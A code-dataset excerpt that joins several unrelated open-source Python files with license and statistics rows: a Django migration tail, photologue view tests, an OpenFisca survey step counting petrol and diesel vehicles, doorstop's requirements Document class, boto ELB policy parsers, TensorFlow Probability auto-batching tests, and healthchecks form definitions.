'tag': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_items'", 'to': "orm['taggit.Tag']"})
}
}
complete_apps = ['catmaid']
| agpl-3.0 | 2,328,740,279,306,109,400 | 72.492604 | 190 | 0.546547 | false | 3.787816 | false | false | false |
petry/django-photologue-old | photologue/tests/views_gallery.py | 1 | 1840 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from django.core.urlresolvers import reverse
from photologue.tests import helpers
from photologue.tests.helpers import RequestTest
YEAR = datetime.now().year
MONTH = datetime.now().ctime().split(' ')[1].lower()
DAY = datetime.now().day
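# For illustration only (not part of the original tests): on 9 June 2013 the
# constants above would be YEAR=2013, MONTH='jun', DAY=9, matching the
# year/month/day kwargs expected by the archive URL patterns exercised below.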
class RequestGalleryTest(RequestTest):
def setUp(self):
super(RequestGalleryTest, self).setUp()
self.gallery = helpers._create_new_gallery(
name='Fake Gallery', slug='fake-gallery')
def tearDown(self):
super(RequestGalleryTest, self).tearDown()
self.gallery.delete()
def test_archive_gallery_url_works(self):
self.assertUrl(
reverse('pl-gallery-archive')
)
def test_paginated_gallery_url_works(self):
self.assertUrl(
reverse('pl-gallery-list', kwargs={'page': 1})
)
def test_gallery_works(self):
self.assertUrl(
reverse('pl-gallery', kwargs={'slug': 'fake-gallery'})
)
def test_archive_year_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-year',
kwargs={'year': YEAR}
)
)
def test_archive_month_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-month',
kwargs={'year': YEAR, 'month':MONTH}
)
)
def test_archive_day_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-archive-day',
kwargs={'year': YEAR, 'month':MONTH, 'day': DAY}
)
)
def test_detail_gallery_works(self):
self.assertUrl(
reverse('pl-gallery-detail',
kwargs={'year': YEAR, 'month':MONTH, 'day': DAY, 'slug': 'fake-gallery'}
)
) | bsd-3-clause | -3,286,291,012,856,413,000 | 27.765625 | 88 | 0.577174 | false | 3.923241 | true | false | false |
LouisePaulDelvaux/openfisca-france-data | openfisca_france_data/input_data_builders/build_openfisca_indirect_taxation_survey_data/step_0_2_homogeneisation_vehicules.py | 1 | 4481 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# OpenFisca -- A versatile microsimulation software
# By: OpenFisca Team <[email protected]>
#
# Copyright (C) 2011, 2012, 2013, 2014, 2015 OpenFisca Team
# https://github.com/openfisca
#
# This file is part of OpenFisca.
#
# OpenFisca is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# OpenFisca is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import logging
from openfisca_survey_manager.survey_collections import SurveyCollection
log = logging.getLogger(__name__)
from openfisca_france_data import default_config_files_directory as config_files_directory
from openfisca_france_data.temporary import TemporaryStore
temporary_store = TemporaryStore.create(file_name = "indirect_taxation_tmp")
#**************************************************************************************************************************
#* Step 0-2: HOMOGENISATION OF VEHICLE DATA
#**************************************************************************************************************************
#**************************************************************************************************************************
#
#
# * DATA ON FUEL TYPES
def build_homogeneisation_vehicules(year = None):
"""Compute vehicule numbers by type"""
assert year is not None
# Load data
bdf_survey_collection = SurveyCollection.load(
collection = 'budget_des_familles', config_files_directory = config_files_directory)
survey = bdf_survey_collection.get_survey('budget_des_familles_{}'.format(year))
if year == 1995:
vehicule = None
        # * The 1995 BdF survey contains no information on the type of fuel used by the vehicles.
if year == 2000:
vehicule = survey.get_values(table = "depmen")
kept_variables = ['ident', 'carbu01', 'carbu02']
vehicule = vehicule[kept_variables]
vehicule.rename(columns = {'ident': 'ident_men'}, inplace = True)
vehicule.rename(columns = {'carbu01': 'carbu1'}, inplace = True)
vehicule.rename(columns = {'carbu02': 'carbu2'}, inplace = True)
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = 1*(vehicule['carbu1'] == 1) + 1*(vehicule['carbu2'] == 1)
vehicule["veh_diesel"] = 1*(vehicule['carbu1'] == 2) + 1*(vehicule['carbu2'] == 2)
if year == 2005:
vehicule = survey.get_values(table = "automobile")
kept_variables = ['ident_men', 'carbu']
vehicule = vehicule[kept_variables]
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = (vehicule['carbu'] == 1)
vehicule["veh_diesel"] = (vehicule['carbu'] == 2)
if year == 2011:
try:
vehicule = survey.get_values(table = "AUTOMOBILE")
except:
vehicule = survey.get_values(table = "automobile")
kept_variables = ['ident_me', 'carbu']
vehicule = vehicule[kept_variables]
vehicule.rename(columns = {'ident_me': 'ident_men'}, inplace = True)
vehicule["veh_tot"] = 1
vehicule["veh_essence"] = (vehicule['carbu'] == 1)
vehicule["veh_diesel"] = (vehicule['carbu'] == 2)
# Compute the number of cars by category
if year != 1995:
vehicule = vehicule.groupby(by = 'ident_men')["veh_tot", "veh_essence", "veh_diesel"].sum()
vehicule["pourcentage_vehicule_essence"] = 0
vehicule.pourcentage_vehicule_essence[vehicule.veh_tot != 0] = vehicule.veh_essence / vehicule.veh_tot
# Save in temporary store
temporary_store['automobile_{}'.format(year)] = vehicule
temporary_store.close()
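# For illustration only (not part of the original module): for post-1995
# years the stored frame has one row per ident_men, with columns roughly like
#
#   veh_tot  veh_essence  veh_diesel  pourcentage_vehicule_essence
#   2        1            1           0.5
#   1        0            1           0.0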
if __name__ == '__main__':
import sys
import time
logging.basicConfig(level = logging.INFO, stream = sys.stdout)
deb = time.clock()
year = 1995
build_homogeneisation_vehicules(year = year)
log.info("step 0_2_homogeneisation_vehicules duration is {}".format(time.clock() - deb))
| agpl-3.0 | -2,859,668,005,457,323,500 | 38.27193 | 123 | 0.611124 | false | 3.443846 | false | false | false |
elewis33/doorstop | doorstop/core/document.py | 1 | 24092 | """Representation of a collection of items."""
import os
from itertools import chain
from collections import OrderedDict
from doorstop import common
from doorstop.common import DoorstopError, DoorstopWarning
from doorstop.core.base import (add_document, edit_document, delete_document,
auto_load, auto_save,
BaseValidatable, BaseFileObject)
from doorstop.core.types import Prefix, UID, Level
from doorstop.core.item import Item
from doorstop import settings
log = common.logger(__name__)
class Document(BaseValidatable, BaseFileObject): # pylint: disable=R0902
"""Represents a document directory containing an outline of items."""
CONFIG = '.doorstop.yml'
SKIP = '.doorstop.skip' # indicates this document should be skipped
INDEX = 'index.yml'
DEFAULT_PREFIX = Prefix('REQ')
DEFAULT_SEP = ''
DEFAULT_DIGITS = 3
def __init__(self, path, root=os.getcwd(), **kwargs):
"""Initialize a document from an exiting directory.
:param path: path to document directory
:param root: path to root of project
"""
super().__init__()
# Ensure the directory is valid
if not os.path.isfile(os.path.join(path, Document.CONFIG)):
relpath = os.path.relpath(path, root)
msg = "no {} in {}".format(Document.CONFIG, relpath)
raise DoorstopError(msg)
# Initialize the document
self.path = path
self.root = root
self.tree = kwargs.get('tree')
self.auto = kwargs.get('auto', Document.auto)
# Set default values
self._data['prefix'] = Document.DEFAULT_PREFIX
self._data['sep'] = Document.DEFAULT_SEP
self._data['digits'] = Document.DEFAULT_DIGITS
self._data['parent'] = None # the root document does not have a parent
self._items = []
self._itered = False
def __repr__(self):
return "Document('{}')".format(self.path)
def __str__(self):
if common.verbosity < common.STR_VERBOSITY:
return self.prefix
else:
return "{} ({})".format(self.prefix, self.relpath)
def __iter__(self):
yield from self._iter()
def __len__(self):
return len(list(self._iter()))
def __bool__(self): # override `__len__` behavior, pylint: disable=R0201
return True
@staticmethod
@add_document
def new(tree, path, root, prefix, sep=None, digits=None, parent=None, auto=None): # pylint: disable=R0913,C0301
"""Internal method to create a new document.
:param tree: reference to tree that contains this document
:param path: path to directory for the new document
:param root: path to root of the project
:param prefix: prefix for the new document
:param sep: separator between prefix and numbers
:param digits: number of digits for the new document
:param parent: parent UID for the new document
:param auto: automatically save the document
:raises: :class:`~doorstop.common.DoorstopError` if the document
already exists
:return: new :class:`~doorstop.core.document.Document`
"""
# TODO: raise a specific exception for invalid separator characters?
assert not sep or sep in settings.SEP_CHARS
config = os.path.join(path, Document.CONFIG)
# Check for an existing document
if os.path.exists(config):
raise DoorstopError("document already exists: {}".format(path))
# Create the document directory
Document._create(config, name='document')
# Initialize the document
document = Document(path, root=root, tree=tree, auto=False)
document.prefix = prefix if prefix is not None else document.prefix
document.sep = sep if sep is not None else document.sep
document.digits = digits if digits is not None else document.digits
document.parent = parent if parent is not None else document.parent
if auto or (auto is None and Document.auto):
document.save()
# Return the document
return document
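    # Illustrative usage sketch, not part of the original module; the path
    # and prefix below are made up:
    #
    #   >>> doc = Document.new(tree=None, path='reqs/sys', root='.',
    #   ...                    prefix='SYS', digits=3)
    #
    # creates ``reqs/sys/.doorstop.yml`` and returns the new document object.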
def load(self, reload=False):
"""Load the document's properties from its file."""
if self._loaded and not reload:
return
log.debug("loading {}...".format(repr(self)))
# Read text from file
text = self._read(self.config)
# Parse YAML data from text
data = self._load(text, self.config)
# Store parsed data
sets = data.get('settings', {})
for key, value in sets.items():
if key == 'prefix':
self._data['prefix'] = Prefix(value)
elif key == 'sep':
self._data['sep'] = value.strip()
elif key == 'parent':
self._data['parent'] = value.strip()
elif key == 'digits':
self._data['digits'] = int(value)
# Set meta attributes
self._loaded = True
if reload:
list(self._iter(reload=reload))
@edit_document
def save(self):
"""Save the document's properties to its file."""
log.debug("saving {}...".format(repr(self)))
# Format the data items
data = {}
sets = {}
for key, value in self._data.items():
if key == 'prefix':
sets['prefix'] = str(value)
elif key == 'sep':
sets['sep'] = value
elif key == 'digits':
sets['digits'] = value
elif key == 'parent':
if value:
sets['parent'] = value
else:
data[key] = value
data['settings'] = sets
# Dump the data to YAML
text = self._dump(data)
# Save the YAML to file
self._write(text, self.config)
# Set meta attributes
self._loaded = False
self.auto = True
def _iter(self, reload=False):
"""Yield the document's items."""
if self._itered and not reload:
msg = "iterating document {}'s loaded items...".format(self)
log.debug(msg)
yield from list(self._items)
return
log.info("loading document {}'s items...".format(self))
# Reload the document's item
self._items = []
for dirpath, dirnames, filenames in os.walk(self.path):
for dirname in list(dirnames):
path = os.path.join(dirpath, dirname, Document.CONFIG)
if os.path.exists(path):
path = os.path.dirname(path)
dirnames.remove(dirname)
log.trace("skipped embedded document: {}".format(path))
for filename in filenames:
path = os.path.join(dirpath, filename)
try:
item = Item(path, root=self.root,
document=self, tree=self.tree)
except DoorstopError:
pass # skip non-item files
else:
self._items.append(item)
if reload:
item.load(reload=reload)
if settings.CACHE_ITEMS and self.tree:
self.tree._item_cache[item.uid] = item # pylint: disable=W0212
log.trace("cached item: {}".format(item))
# Set meta attributes
self._itered = True
# Yield items
yield from list(self._items)
# properties #############################################################
@property
def config(self):
"""Get the path to the document's file."""
return os.path.join(self.path, Document.CONFIG)
@property
@auto_load
def prefix(self):
"""Get the document's prefix."""
return self._data['prefix']
@prefix.setter
@auto_save
@auto_load
def prefix(self, value):
"""Set the document's prefix."""
self._data['prefix'] = Prefix(value)
# TODO: should the new prefix be applied to all items?
@property
@auto_load
def sep(self):
"""Get the prefix-number separator to use for new item UIDs."""
return self._data['sep']
@sep.setter
@auto_save
@auto_load
def sep(self, value):
"""Set the prefix-number separator to use for new item UIDs."""
# TODO: raise a specific exception for invalid separator characters?
assert not value or value in settings.SEP_CHARS
self._data['sep'] = value.strip()
# TODO: should the new separator be applied to all items?
@property
@auto_load
def digits(self):
"""Get the number of digits to use for new item UIDs."""
return self._data['digits']
@digits.setter
@auto_save
@auto_load
def digits(self, value):
"""Set the number of digits to use for new item UIDs."""
self._data['digits'] = value
# TODO: should the new digits be applied to all items?
@property
@auto_load
def parent(self):
"""Get the document's parent document prefix."""
return self._data['parent']
@parent.setter
@auto_save
@auto_load
def parent(self, value):
"""Set the document's parent document prefix."""
self._data['parent'] = str(value) if value else ""
@property
def items(self):
"""Get an ordered list of items in the document."""
return sorted(self._iter())
@property
def depth(self):
"""Return the maximum item level depth."""
return max(item.depth for item in self)
@property
def next_number(self):
"""Get the next item number for the document."""
try:
number = max(item.number for item in self) + 1
except ValueError:
number = 1
log.debug("next number (local): {}".format(number))
if self.tree and self.tree.request_next_number:
remote_number = 0
while remote_number is not None and remote_number < number:
if remote_number:
log.warn("server is behind, requesting next number...")
remote_number = self.tree.request_next_number(self.prefix)
log.debug("next number (remote): {}".format(remote_number))
if remote_number:
number = remote_number
return number
@property
def skip(self):
"""Indicate the document should be skipped."""
return os.path.isfile(os.path.join(self.path, Document.SKIP))
@property
def index(self):
"""Get the path to the document's index if it exists else `None`."""
path = os.path.join(self.path, Document.INDEX)
if os.path.exists(path):
return path
@index.setter
def index(self, value):
"""Create or update the document's index."""
if value:
path = os.path.join(self.path, Document.INDEX)
log.info("creating {} index...".format(self))
common.write_lines(self._lines_index(self.items), path)
@index.deleter
def index(self):
"""Delete the document's index if it exists."""
log.info("deleting {} index...".format(self))
common.delete(self.index)
# actions ################################################################
# decorators are applied to methods in the associated classes
def add_item(self, number=None, level=None, reorder=True):
"""Create a new item for the document and return it.
:param number: desired item number
:param level: desired item level
:param reorder: update levels of document items
:return: added :class:`~doorstop.core.item.Item`
"""
number = max(number or 0, self.next_number)
log.debug("next number: {}".format(number))
try:
last = self.items[-1]
except IndexError:
next_level = level
else:
if level:
next_level = level
elif last.level.heading:
next_level = last.level >> 1
next_level.heading = False
else:
next_level = last.level + 1
log.debug("next level: {}".format(next_level))
uid = UID(self.prefix, self.sep, number, self.digits)
item = Item.new(self.tree, self,
self.path, self.root, uid,
level=next_level)
if level and reorder:
self.reorder(keep=item)
return item
# decorators are applied to methods in the associated classes
def remove_item(self, value, reorder=True):
"""Remove an item by its UID.
:param value: item or UID
:param reorder: update levels of document items
:raises: :class:`~doorstop.common.DoorstopError` if the item
cannot be found
:return: removed :class:`~doorstop.core.item.Item`
"""
uid = UID(value)
item = self.find_item(uid)
item.delete()
if reorder:
self.reorder()
return item
# decorators are applied to methods in the associated classes
def reorder(self, manual=True, automatic=True, start=None, keep=None,
_items=None):
"""Reorder a document's items.
        Two methods are used to create the outline order:
- manual: specify the order using an updated index file
- automatic: shift duplicate levels and compress gaps
:param manual: enable manual ordering using the index (if one exists)
:param automatic: enable automatic ordering (after manual ordering)
:param start: level to start numbering (None = use current start)
:param keep: item or UID to keep over duplicates
"""
# Reorder manually
if manual and self.index:
log.info("reordering {} from index...".format(self))
self._reorder_from_index(self, self.index)
del self.index
# Reorder automatically
if automatic:
log.info("reordering {} automatically...".format(self))
items = _items or self.items
keep = self.find_item(keep) if keep else None
self._reorder_automatic(items, start=start, keep=keep)
@staticmethod
def _lines_index(items):
"""Generate (pseudo) YAML lines for the document index."""
yield '#' * settings.MAX_LINE_LENGTH
yield '# THIS TEMPORARY FILE WILL BE DELETED AFTER DOCUMENT REORDERING'
yield '# MANUALLY INDENT, DEDENT, & MOVE ITEMS TO THEIR DESIRED LEVEL'
        yield '# CHANGES WILL BE REFLECTED IN THE ITEM FILES AFTER CONFIRMATION'
yield '#' * settings.MAX_LINE_LENGTH
yield ''
yield "initial: {}".format(items[0].level if items else 1.0)
yield "outline:"
for item in items:
space = " " * item.depth
comment = item.text.replace('\n', ' ') or item.ref
line = space + "- {u}: # {c}".format(u=item.uid, c=comment)
if len(line) > settings.MAX_LINE_LENGTH:
line = line[:settings.MAX_LINE_LENGTH - 3] + '...'
yield line
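    # Editor-added note (illustrative, not from the original source): for a small
    # document the index generated above might look like this, with hypothetical UIDs:
    #
    #   initial: 1.0
    #   outline:
    #       - REQ001: # The system shall do X.
    #       - REQ002: # The system shall do Y.
    #           - REQ003: # Handle the error case of Y.
    #
    # Indenting, dedenting, or moving a "- UID:" line and saving the file changes
    # the corresponding item's level when reorder() processes the index.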
@staticmethod
def _reorder_from_index(document, path):
"""Reorder a document's item from the index."""
# Load and parse index
text = common.read_text(path)
data = common.load_yaml(text, path)
# Read updated values
initial = data.get('initial', 1.0)
outline = data.get('outline', [])
# Update levels
level = Level(initial)
Document._reorder_section(outline, level, document)
@staticmethod
def _reorder_section(section, level, document):
"""Recursive function to reorder a section of an outline.
:param section: recursive `list` of `dict` loaded from document index
:param level: current :class:`~doorstop.core.types.Level`
:param document: :class:`~doorstop.core.document.Document` to order
"""
if isinstance(section, dict): # a section
# Get the item and subsection
uid = list(section.keys())[0]
try:
item = document.find_item(uid)
except DoorstopError as exc:
log.debug(exc)
item = None
subsection = section[uid]
# An item is a header if it has a subsection
level.heading = bool(subsection)
# Apply the new level
if item is None:
log.info("({}): {}".format(uid, level))
elif item.level == level:
log.info("{}: {}".format(item, level))
else:
log.info("{}: {} to {}".format(item, item.level, level))
if item:
item.level = level
# Process the heading's subsection
if subsection:
Document._reorder_section(subsection, level >> 1, document)
elif isinstance(section, list): # a list of sections
# Process each subsection
for index, subsection in enumerate(section):
Document._reorder_section(subsection, level + index, document)
@staticmethod
def _reorder_automatic(items, start=None, keep=None):
"""Reorder a document's items automatically.
:param items: items to reorder
:param start: level to start numbering (None = use current start)
:param keep: item to keep over duplicates
"""
nlevel = plevel = None
for clevel, item in Document._items_by_level(items, keep=keep):
log.debug("current level: {}".format(clevel))
# Determine the next level
if not nlevel:
# Use the specified or current starting level
nlevel = Level(start) if start else clevel
nlevel.heading = clevel.heading
log.debug("next level (start): {}".format(nlevel))
else:
# Adjust the next level to be the same depth
if len(clevel) > len(nlevel):
nlevel >>= len(clevel) - len(nlevel)
log.debug("matched current indent: {}".format(nlevel))
elif len(clevel) < len(nlevel):
nlevel <<= len(nlevel) - len(clevel)
# nlevel += 1
log.debug("matched current dedent: {}".format(nlevel))
nlevel.heading = clevel.heading
# Check for a level jump
_size = min(len(clevel.value), len(plevel.value))
for index in range(max(_size - 1, 1)):
if clevel.value[index] > plevel.value[index]:
nlevel <<= len(nlevel) - 1 - index
nlevel += 1
nlevel >>= len(clevel) - len(nlevel)
msg = "next level (jump): {}".format(nlevel)
log.debug(msg)
break
# Check for a normal increment
else:
if len(nlevel) <= len(plevel):
nlevel += 1
msg = "next level (increment): {}".format(nlevel)
log.debug(msg)
else:
msg = "next level (indent/dedent): {}".format(nlevel)
log.debug(msg)
# Apply the next level
if clevel == nlevel:
log.info("{}: {}".format(item, clevel))
else:
log.info("{}: {} to {}".format(item, clevel, nlevel))
item.level = nlevel.copy()
# Save the current level as the previous level
plevel = clevel.copy()
@staticmethod
def _items_by_level(items, keep=None):
"""Iterate through items by level with the kept item first."""
# Collect levels
levels = OrderedDict()
for item in items:
if item.level in levels:
levels[item.level].append(item)
else:
levels[item.level] = [item]
# Reorder levels
for level, items in levels.items():
# Reorder items at this level
if keep in items:
# move the kept item to the front of the list
log.debug("keeping {} level over duplicates".format(keep))
items = [items.pop(items.index(keep))] + items
for item in items:
yield level, item
def find_item(self, value, _kind=''):
"""Return an item by its UID.
:param value: item or UID
:raises: :class:`~doorstop.common.DoorstopError` if the item
cannot be found
:return: matching :class:`~doorstop.core.item.Item`
"""
uid = UID(value)
for item in self:
if item.uid == uid:
return item
raise DoorstopError("no matching{} UID: {}".format(_kind, uid))
def get_issues(self, item_hook=None, **kwargs):
"""Yield all the document's issues.
:param item_hook: function to call for custom item validation
:return: generator of :class:`~doorstop.common.DoorstopError`,
:class:`~doorstop.common.DoorstopWarning`,
:class:`~doorstop.common.DoorstopInfo`
"""
assert kwargs.get('document_hook') is None
hook = item_hook if item_hook else lambda **kwargs: []
log.info("checking document {}...".format(self))
# Check for items
items = self.items
if not items:
yield DoorstopWarning("no items")
return
# Reorder or check item levels
if settings.REORDER:
self.reorder(_items=items)
elif settings.CHECK_LEVELS:
yield from self._get_issues_level(items)
# Check each item
for item in items:
# Check item
for issue in chain(hook(item=item, document=self, tree=self.tree),
item.get_issues()):
# Prepend the item's UID to yielded exceptions
if isinstance(issue, Exception):
yield type(issue)("{}: {}".format(item.uid, issue))
@staticmethod
def _get_issues_level(items):
"""Yield all the document's issues related to item level."""
prev = items[0] if items else None
for item in items[1:]:
puid = prev.uid
plev = prev.level
nuid = item.uid
nlev = item.level
log.debug("checking level {} to {}...".format(plev, nlev))
# Duplicate level
if plev == nlev:
uids = sorted((puid, nuid))
msg = "duplicate level: {} ({}, {})".format(plev, *uids)
yield DoorstopWarning(msg)
# Skipped level
length = min(len(plev.value), len(nlev.value))
for index in range(length):
# Types of skipped levels:
# 1. over: 1.0 --> 1.2
# 2. out: 1.1 --> 3.0
if (nlev.value[index] - plev.value[index] > 1 or
# 3. over and out: 1.1 --> 2.2
(plev.value[index] != nlev.value[index] and
index + 1 < length and
nlev.value[index + 1] not in (0, 1))):
msg = "skipped level: {} ({}), {} ({})".format(plev, puid,
nlev, nuid)
yield DoorstopWarning(msg)
break
prev = item
@delete_document
def delete(self, path=None):
"""Delete the document and its items."""
for item in self:
item.delete()
# the document is deleted in the decorated method
| lgpl-3.0 | 291,275,080,082,622,800 | 36.121726 | 116 | 0.546156 | false | 4.42055 | true | false | false |
SaranyaKarthikeyan/boto | boto/ec2/elb/policies.py | 152 | 3856 | # Copyright (c) 2010 Reza Lotun http://reza.lotun.name
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from boto.resultset import ResultSet
class AppCookieStickinessPolicy(object):
def __init__(self, connection=None):
self.cookie_name = None
self.policy_name = None
def __repr__(self):
return 'AppCookieStickiness(%s, %s)' % (self.policy_name,
self.cookie_name)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'CookieName':
self.cookie_name = value
elif name == 'PolicyName':
self.policy_name = value
class LBCookieStickinessPolicy(object):
def __init__(self, connection=None):
self.policy_name = None
self.cookie_expiration_period = None
def __repr__(self):
return 'LBCookieStickiness(%s, %s)' % (self.policy_name,
self.cookie_expiration_period)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'CookieExpirationPeriod':
self.cookie_expiration_period = value
elif name == 'PolicyName':
self.policy_name = value
class OtherPolicy(object):
def __init__(self, connection=None):
self.policy_name = None
def __repr__(self):
return 'OtherPolicy(%s)' % (self.policy_name)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
self.policy_name = value
class Policies(object):
"""
ELB Policies
"""
def __init__(self, connection=None):
self.connection = connection
self.app_cookie_stickiness_policies = None
self.lb_cookie_stickiness_policies = None
self.other_policies = None
def __repr__(self):
app = 'AppCookieStickiness%s' % self.app_cookie_stickiness_policies
lb = 'LBCookieStickiness%s' % self.lb_cookie_stickiness_policies
other = 'Other%s' % self.other_policies
return 'Policies(%s,%s,%s)' % (app, lb, other)
def startElement(self, name, attrs, connection):
if name == 'AppCookieStickinessPolicies':
rs = ResultSet([('member', AppCookieStickinessPolicy)])
self.app_cookie_stickiness_policies = rs
return rs
elif name == 'LBCookieStickinessPolicies':
rs = ResultSet([('member', LBCookieStickinessPolicy)])
self.lb_cookie_stickiness_policies = rs
return rs
elif name == 'OtherPolicies':
rs = ResultSet([('member', OtherPolicy)])
self.other_policies = rs
return rs
def endElement(self, name, value, connection):
return
| mit | 2,679,070,068,852,678,000 | 34.703704 | 77 | 0.643932 | false | 4.205016 | false | false | false |
tensorflow/probability | tensorflow_probability/python/experimental/auto_batching/tf_backend_test.py | 1 | 4331 | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for the TF implementations of auto-batched VM variables."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import hypothesis as hp
from hypothesis import strategies as hps
from hypothesis.extra import numpy as hpnp
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.experimental.auto_batching import backend_test_lib as backend_test
from tensorflow_probability.python.experimental.auto_batching import instructions as inst
from tensorflow_probability.python.experimental.auto_batching import tf_backend
from tensorflow_probability.python.internal import hypothesis_testlib as tfp_hps
from tensorflow_probability.python.internal import test_util
# TODO(b/127689162): Restore testing complex dtypes.
# TF_NP_DTYPES = [np.float32, np.float64, np.int32, np.complex64, np.bool_]
TF_NP_DTYPES = [np.float32, np.float64, np.int32, np.bool_]
TF_BACKEND = tf_backend.TensorFlowBackend()
def var_init(max_stack_depth, initial_value):
type_ = inst.TensorType(initial_value.dtype, initial_value.shape[1:])
var = TF_BACKEND.create_variable(
None, inst.VariableAllocation.FULL, type_,
max_stack_depth, batch_size=initial_value.shape[0])
return var.update(
initial_value, TF_BACKEND.full_mask(initial_value.shape[0]))
@test_util.test_all_tf_execution_regimes
class TFVariableTest(test_util.TestCase, backend_test.VariableTestCase):
def testTFSmoke(self):
"""Test the property on specific example, without relying on Hypothesis."""
init = (12, np.random.randn(3, 2, 2).astype(np.float32))
ops = [('pop', [False, False, True]),
('push', [True, False, True]),
('update', np.ones((3, 2, 2), dtype=np.float32),
[True, True, False]),
('pop', [True, False, True])]
self.check_same_results(
init, ops, var_init, to_numpy_arrays=self.evaluate,
exception_types=(ValueError, tf.errors.InvalidArgumentError))
@hp.given(hps.data())
@tfp_hps.tfp_hp_settings()
def testTFVariableRandomOps(self, data):
# Hypothesis strategy:
# Generate a random max stack depth and value shape
# Deduce the batch size from the value shape
# Make a random dtype
# Generate a random initial value of that dtype and shape
# Generate ops, some of which write random values of that dtype and shape
max_stack_depth = data.draw(hps.integers(min_value=1, max_value=100))
value_shape = data.draw(hpnp.array_shapes(min_dims=1))
batch_size = value_shape[0]
dtype = data.draw(hps.one_of(*map(hps.just, TF_NP_DTYPES)))
masks = hpnp.arrays(dtype=np.bool_, shape=[batch_size])
values = hpnp.arrays(dtype, value_shape)
init_val = data.draw(values)
ops = data.draw(
hps.lists(
hps.one_of(
hps.tuples(hps.just('update'), values, masks),
hps.tuples(hps.just('push'), masks),
hps.tuples(hps.just('pop'), masks), # preserve line break
hps.tuples(hps.just('read')))))
init = (max_stack_depth, init_val)
self.check_same_results(
init, ops, var_init, to_numpy_arrays=self.evaluate,
exception_types=(ValueError, tf.errors.InvalidArgumentError))
def testClosingOverTensorDoesntRaise(self):
x = tf.constant(0.)
def f(y):
return y * x
arg_types = [inst.Type([inst.TensorType(shape=[], dtype=np.float32)])]
TF_BACKEND.run_on_dummies(f, arg_types)
def testDtypeMergingBoolsDoesntRaise(self):
TF_BACKEND.merge_dtypes(np.bool_, np.bool_)
if __name__ == '__main__':
tf.test.main()
| apache-2.0 | 8,641,079,420,912,624,000 | 39.476636 | 101 | 0.688294 | false | 3.55 | true | false | false |
iphoting/healthchecks | hc/front/forms.py | 1 | 8776 | from datetime import timedelta as td
import json
import re
from urllib.parse import quote, urlencode
from django import forms
from django.forms import URLField
from django.conf import settings
from django.core.exceptions import ValidationError
from hc.front.validators import (
CronExpressionValidator,
TimezoneValidator,
WebhookValidator,
)
import requests
class HeadersField(forms.Field):
message = """Use "Header-Name: value" pairs, one per line."""
def to_python(self, value):
if not value:
return {}
headers = {}
for line in value.split("\n"):
if not line.strip():
continue
if ":" not in line:
raise ValidationError(self.message)
n, v = line.split(":", maxsplit=1)
n, v = n.strip(), v.strip()
if not n or not v:
raise ValidationError(message=self.message)
headers[n] = v
return headers
def validate(self, value):
super().validate(value)
for k, v in value.items():
if len(k) > 1000 or len(v) > 1000:
raise ValidationError("Value too long")
class NameTagsForm(forms.Form):
name = forms.CharField(max_length=100, required=False)
tags = forms.CharField(max_length=500, required=False)
desc = forms.CharField(required=False)
def clean_tags(self):
result = []
for part in self.cleaned_data["tags"].split(" "):
part = part.strip()
if part != "":
result.append(part)
return " ".join(result)
class FilteringRulesForm(forms.Form):
filter_by_subject = forms.ChoiceField(choices=(("no", "no"), ("yes", "yes")))
subject = forms.CharField(required=False, max_length=100)
subject_fail = forms.CharField(required=False, max_length=100)
methods = forms.ChoiceField(required=False, choices=(("", "Any"), ("POST", "POST")))
manual_resume = forms.BooleanField(required=False)
def clean_subject(self):
if self.cleaned_data["filter_by_subject"] == "yes":
return self.cleaned_data["subject"]
return ""
def clean_subject_fail(self):
if self.cleaned_data["filter_by_subject"] == "yes":
return self.cleaned_data["subject_fail"]
return ""
class TimeoutForm(forms.Form):
timeout = forms.IntegerField(min_value=60, max_value=2592000)
grace = forms.IntegerField(min_value=60, max_value=2592000)
def clean_timeout(self):
return td(seconds=self.cleaned_data["timeout"])
def clean_grace(self):
return td(seconds=self.cleaned_data["grace"])
class CronForm(forms.Form):
schedule = forms.CharField(max_length=100, validators=[CronExpressionValidator()])
